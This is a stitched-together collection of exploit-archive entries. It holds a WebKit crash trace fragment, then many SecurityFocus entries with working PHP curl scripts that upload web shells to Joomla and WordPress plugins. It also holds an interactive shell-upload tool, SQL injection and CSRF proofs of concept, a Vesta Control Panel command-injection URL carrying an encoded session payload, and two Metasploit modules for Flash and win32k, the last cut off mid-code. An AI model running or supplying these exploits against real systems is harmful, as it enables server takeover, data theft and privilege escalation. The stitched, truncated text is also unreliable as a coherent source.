27 com.apple.WebCore 0x0000000104e4f002
WebCore::RenderLayer::paintLayer(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 1010
28 com.apple.WebCore 0x0000000104e4fd62
WebCore::RenderLayer::paintLayerContents(WebCore::GraphicsContext*,
WebCore::RenderLayer::LayerPaintingInfo const&, unsigned int) + 2882
29 com.apple.WebCore 0x0000000104e7ac36
WebCore::RenderLayerBacking::paintIntoLayer(WebCore::GraphicsLayer
const*, WebCore::GraphicsContext*, WebCore::IntRect const&, unsigned
int, unsigned int) + 358
30 com.apple.WebCore 0x000000010593757f
WebCore::RenderLayerBacking::paintContents(WebCore::GraphicsLayer
const*, WebCore::GraphicsContext&, unsigned int, WebCore::FloatRect
const&) + 799
31 com.apple.WebCore 0x000000010537dd44
WebCore::GraphicsLayer::paintGraphicsLayerContents(WebCore::GraphicsContext&,
WebCore::FloatRect const&) + 132
32 com.apple.WebCore 0x00000001058b6ad9
WebCore::PlatformCALayer::drawLayerContents(CGContext*,
WebCore::PlatformCALayer*, WTF::Vector<WebCore::FloatRect, 5ul,
WTF::CrashOnOverflow>&) + 361
33 com.apple.WebCore 0x0000000105b170a7
WebCore::TileGrid::platformCALayerPaintContents(WebCore::PlatformCALayer*,
WebCore::GraphicsContext&, WebCore::FloatRect const&) + 167
34 com.apple.WebCore 0x0000000105ba36cc -[WebSimpleLayer
drawInContext:] + 172
35 com.apple.QuartzCore 0x00007fff8d7033c7
CABackingStoreUpdate_ + 3306
36 com.apple.QuartzCore 0x00007fff8d7026d7
___ZN2CA5Layer8display_Ev_block_invoke + 59
37 com.apple.QuartzCore 0x00007fff8d702694
x_blame_allocations + 81
38 com.apple.QuartzCore 0x00007fff8d6f643c
CA::Layer::display_() + 1546
39 com.apple.WebCore 0x0000000105ba35eb -[WebSimpleLayer
display] + 43
40 com.apple.QuartzCore 0x00007fff8d6f47fd
CA::Layer::display_if_needed(CA::Transaction*) + 603
41 com.apple.QuartzCore 0x00007fff8d6f3e81
CA::Layer::layout_and_display_if_needed(CA::Transaction*) + 35
42 com.apple.QuartzCore 0x00007fff8d6f3612
CA::Context::commit_transaction(CA::Transaction*) + 242
43 com.apple.QuartzCore 0x00007fff8d6f33ae
CA::Transaction::commit() + 390
44 com.apple.QuartzCore 0x00007fff8d701f19
CA::Transaction::observer_callback(__CFRunLoopObserver*, unsigned long,
void*) + 71
45 com.apple.CoreFoundation 0x00007fff869f7127
__CFRUNLOOP_IS_CALLING_OUT_TO_AN_OBSERVER_CALLBACK_FUNCTION__ + 23
46 com.apple.CoreFoundation 0x00007fff869f7080
__CFRunLoopDoObservers + 368
47 com.apple.CoreFoundation 0x00007fff869e8bf8
CFRunLoopRunSpecific + 328
48 com.apple.HIToolbox 0x00007fff8df1156f
RunCurrentEventLoopInMode + 235
49 com.apple.HIToolbox 0x00007fff8df112ea
ReceiveNextEventCommon + 431
50 com.apple.HIToolbox 0x00007fff8df1112b
_BlockUntilNextEventMatchingListInModeWithFilter + 71
51 com.apple.AppKit 0x00007fff8ebe59bb _DPSNextEvent +
978
52 com.apple.AppKit 0x00007fff8ebe4f68 -[NSApplication
nextEventMatchingMask:untilDate:inMode:dequeue:] + 346
53 com.apple.AppKit 0x00007fff8ebdabf3 -[NSApplication
run] + 594
54 com.apple.AppKit 0x00007fff8eb57354 NSApplicationMain
+ 1832
55 libxpc.dylib 0x00007fff8ab77958 _xpc_objc_main +
793
56 libxpc.dylib 0x00007fff8ab79060 xpc_main + 490
57 com.apple.WebKit.WebContent 0x0000000103f10b40 0x103f10000 + 2880
58 libdyld.dylib 0x00007fff873e45c9 start + 1
*/
?>
source: https://www.securityfocus.com/bid/53977/info
The Easy Flash Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.
Easy Flash Uploader 2.0 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/plugins/content/efup_files/helper.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'JPATH_BASE'=>'../../../',
'filesize'=>'2000',
'filetypes'=>'*.*',
'mimetypes'=>"*",
'destination'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
source: https://www.securityfocus.com/bid/53975/info
The jFancy component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
jFancy 2.03 is vulnerable; other versions may also be affected.
Exploit :
PostShell.php
<?php
$uploadfile="lo.php.gif";
$ch = curl_init("http://www.example.com/modules/mod_jfancy/script.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('photoupload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/images/lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53973/info
The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.
IDoEditor 1.6.16 is vulnerable; other versions may also be affected.
<html>
<body>
<center>
<form
action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php"
method="post" enctype="multipart/form-data">
<input type="file" name="pfile">
<input type="submit" name="Submit" value="Upload">
</form>
</center>
</body>
</html>
source: https://www.securityfocus.com/bid/53972/info
The DentroVideo component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
DentroVideo 1.2 is vulnerable; other versions may also be affected.
Exploit 1 :
PostShell.php
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/components/com_dv/externals/phpupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file1'=>"@$uploadfile",
'action'=>'upload'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/lo.php
lo.php
<?php
phpinfo();
?>
Exploit 2 :
PostShell2.php
<?php
$uploadfile="lo.php.mpg3";
$ch =
curl_init("http://www.example.com/components/com_dv/externals/swfupload/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/dvvideos/uploads/originals/lo.php.mpg3
lo.php.mpg3
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53969/info
The Art Uploader component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Art Uploader 1.0.1 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/modules/mod_artuploader/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('userfile'=>"@$uploadfile",
'path'=>'./'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.example.com/modules/mod_artuploader/lo.php
lo.php
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53968/info
The Simple SWFUpload component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Simple SWFUpload 2.0 is vulnerable;other versions may also be affected.
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/administrator/components/com_simpleswfupload/uploadhandler.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/images/stories/lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53967/info
HD FLV Player plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
HD FLV Player 1.7 is vulnerable; other versions may also be affected.
Exploit :
PostShell.php
<?php
$uploadfile="lo.php.jpg";
$ch =
curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-hd-flv-player/uploadVideo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('myfile'=>"@$uploadfile",
'mode'=>'image'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.example.com/wordpress/wp-content/uploads/18_lo.php.jpg
Filename : [CTRL-u] PostShell.php after executed
lo.php.jpg
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53945/info
FileManager is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
nj3ct0rK3d-Sh3lL#";
$uploadfile = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
if ($uploadfile != "exit")
{
$ch = curl_init("http://www.example.com/modules/fileManager/xupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'path'=>'img'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
}
else break;
?>
source: https://www.securityfocus.com/bid/53944/info
The Joomsport component for Joomla! is prone to an SQL-injection vulnerability and an arbitrary file-upload vulnerability because it fails to sanitize user-supplied data.
Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database.
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n|===============================================|";
print "\n| Joomla (com_joomsport) Arbitrary Shell Upload |";
print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com>|";
print "\n|===============================================|\n";
if ($argc < 2)
{
print "\nUsage : php $argv[0] [host] [path]";
print "\nExample : php $argv[0] www.p0c.tld /wp/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "Content-Disposition: form-data; name=\"Filename\"; filename=\"k3d.php.png\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$packet = "POST {$path}components/com_joomsport/includes/imgres.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: image/png\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\n Inj3ct0rK3d-Sh3lL#";
$cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php.png
if ($cmd != "exit")
{
$packet = "GET {$path}k3d.php.png{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
}
else break;
}
?>
Access Shell : http://www.example.com/components/com_joomsport/images/k3d.php.png
#### Exploit (2) Blind SQL Injection =>
<?php
$bs =
curl_init("http://www.example.com/components/com_joomsport/includes/func.php");
curl_setopt($bs, CURLOPT_POST, true);
curl_setopt($bs, CURLOPT_POSTFIELDS,
array('query'=>"SELECT * FROM jos_users"));
curl_setopt($bs, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($bs);
curl_close($bs);
print "$postResult";
?>
source: https://www.securityfocus.com/bid/53942/info
The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/index.php?option=com_alphacontent§ion=weblinks&Itemid=1&lang=de&limitstart=[sqli]
source: https://www.securityfocus.com/bid/53931/info
WordPress Contus Video Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
WordPress Contus Video Gallery 1.3 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php.jpg";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-video-galleryversion-10/upload1.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('myfile'=>"@$uploadfile",
'mode'=>'image'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
source: https://www.securityfocus.com/bid/53924/info
Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible.
<html><head><title>BMC IDM Change PW CSRF PoC</title></head> <body onload="document.getElementById('CSRF').submit()"> <form action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do"; method="post" id="CSRF"> <input type="hidden" name="colChkbx_Tab1" value="CN=Test User,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> <input type="hidden" name="password" value="Abc123!" /> <input type="hidden" name="passwordAgain" value="Abc123!" /> <input type="hidden" name="selAccts" value="CN=user Name,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> </form></body></html>
source: https://www.securityfocus.com/bid/53855/info
WordPress FCChat Widget plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
WordPress FCChat Widget plugin 2.2.12.2 through versions 2.2.13.1 are vulnerable.
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/Upload.php?id=1");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'Submit'=>'submit'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/fcchat/html/images/1_lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
source: https://www.securityfocus.com/bid/53894/info
Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected.
PostShell.php
<?php
$uploadfile="lo.php.gif";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'is_simple'=>'is_simple'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif
lo.php.gif
GIF89a???????????!??????,???????D?;?
<?php
phpinfo();
?>
Advisory ID: HTB23261
Product: Vesta Control Panel
Vendor: http://vestacp.com
Vulnerable Version(s): 0.9.8 and probably prior
Tested Version: 0.9.8
Advisory Publication: May 20, 2015 [without technical details]
Vendor Notification: May 20, 2015
Vendor Patch: June 3, 2015
Public Disclosure: June 17, 2015
Vulnerability Type: OS Command Injection [CWE-78]
CVE Reference: CVE-2015-4117
Risk Level: Critical
CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered critical vulnerability in Vesta Control Panel, which can be exploited to execute arbitrary system commands and gain complete access to the vulnerable system.
The vulnerability exists due to insufficient filtration of user-input passed via the "backup" HTTP GET parametre to "/list/backup/index.php" before using it in the PHP 'exec()' function. A remote authenticated attacker can inject arbitrary commands and execute them on the system with privileges of the default Vesta Control Panel "admin" account.
Successful exploitation of this vulnerability may allow an attacker to gain complete control over the Vesta Control Panel and use it to advance his privileges on the system, manage installed services, reconfigure firewall, etc. Since Vesta Control Panel is a multiuser control panel for hosting multiple websites, any registered client can use the described vulnerability to compromise the entire system.
A simple exploit below will create a PHP session file in "/tmp/" directory with administrative access to Vesta Control Panel:
https://192.168.189.133:8083/list/backup/index.php?backup=123%27%20||%20 echo 'V0VCX1NZU1RFTXxzOjc6ImFwYWNoZTIiO1dFQl9SR1JPVVBTfHM6ODoid3d3LWRhdGEiO1dFQl9QT1JUfHM6NDoiODA4MCI7V0VCX1NTTHxzOjc6Im1vZF9zc2wiO1dFQl9TU0xfUE9SVHxzOjQ6Ijg0NDMiO1BST1hZX1NZU1RFTXxzOjU6Im5naW54IjtQUk9YWV9QT1JUfHM6MjoiODAiO1BST1hZX1NTTF9QT1JUfHM6MzoiNDQzIjtGVFBfU1lTVEVNfHM6NjoidnNmdHBkIjtNQUlMX1NZU1RFTXxzOjU6ImV4aW00IjtJTUFQX1NZU1RFTXxzOjc6ImRvdmVjb3QiO0FOVElWSVJVU19TWVNURU18czowOiIiO0FOVElTUEFNX1NZU1RFTXxzOjA6IiI7REJfU1lTVEVNfHM6NToibXlzcWwiO0ROU19TWVNURU18czo1OiJiaW5kOSI7U1RBVFNfU1lTVEVNfHM6MTc6IndlYmFsaXplcixhd3N0YXRzIjtCQUNLVVBfU1lTVEVNfHM6NToibG9jYWwiO0NST05fU1lTVEVNfHM6NDoiY3JvbiI7RElTS19RVU9UQXxzOjI6Im5vIjtGSVJFV0FMTF9TWVNURU18czo4OiJpcHRhYmxlcyI7RklSRVdBTExfRVhURU5TSU9OfHM6ODoiZmFpbDJiYW4iO1JFUE9TSVRPUll8czo1OiJjbW1udCI7VkVSU0lPTnxzOjU6IjAuOS44IjtMQU5HVUFHRXxzOjI6ImVuIjtsYW5ndWFnZXxzOjI6ImVuIjt1c2VyfHM6NToiYWRtaW4iO2JhY2t8czoxMToiL2xpc3QvdXNlci8iOw==' | base64 --decode > /tmp/sess_12345%20||%20echo%20\
After successful creation of PHP session file, the following cookie can be used to gain administrative access:
GET / HTTP/1.1
Cookie: mp_b5e6ddf58b2d02245a7a19005d1cec48_mixpanel=%7B%22distinct_id%22%3A%20%2214d5bb8613c39-02d2d6f80b48dc8-44564136-1fa400-14d5bb8613d828%22%2C%22%24initial_referrer%22%3A%20%22https%3A%2F%2F192.168.189.133%3A8000%2F%22%2C%22%24initial_referring_domain%22%3A%20%22192.168.189.133%3A8000%22%7D; PHPSESSID=12345
-----------------------------------------------------------------------------------------------
Solution:
Update to Vesta Control Panel 0.9.8-14
More Information:
http://vestacp.com/roadmap/#history
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23261 - https://www.htbridge.com/advisory/HTB23261 - OS Command Injection in Vesta Control Panel.
[2] Vesta Control Panel - http://vestacp.com - Open Source web hosting control panel with premium features, secure, advanced and minimalistic design
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
of the ShaderJob after starting the job it's possible to create a buffer overflow condition
where the size of the destination buffer and the length of the copy are controlled. This
module has been tested successfully on:
* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
* Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3090'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = NormalRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows ClientCopyImage Win32k Exploit',
'Description' => %q{
This module exploits improper object handling in the win32k.sys kernel mode driver.
This module has been tested on vulnerable builds of Windows 7 x64 and x86, and
Windows 2008 R2 SP1 x64.
},
'License' => MSF_LICENSE,
'Author' => [
'Unknown', # vulnerability discovery and exploit in the wild
'hfirefox', # Code released on github
'OJ Reeves' # msf module
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => 'win',
'SessionTypes' => [ 'metrepreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
},
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
['CVE', '2015-1701'],
['MSB', 'MS15-051'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],
['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],
['URL', 'https://technet.microsoft.com/library/security/MS15-051']
],
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0
}))
end
def check
# Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)
# Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works)
# Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)
# Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)
if sysinfo['OS'] !~ /windows/i
return Exploit::CheckCode::Unknown
end
if sysinfo['Architecture'] =~ /(wow|x)64/i
arch = ARCH_X86_64
elsif sysinfo['Architecture'] =~ /x86/i
arch = ARCH_X86
end
file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
return Exploit::CheckCode::Safe if build == 7601
return Exploit::CheckCode::Detected
end
def exploit
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if sysinfo['Architecture'] =~ /wow64/i
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
end
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Metrepreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
if target.arch.first == ARCH_X86
dll_file_name = 'cve-2015-1701.x86.dll'
else
dll_file_name = 'cve-2015-1701.x64.dll'
end
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)
library_path = ::File.expand_path(library_path)
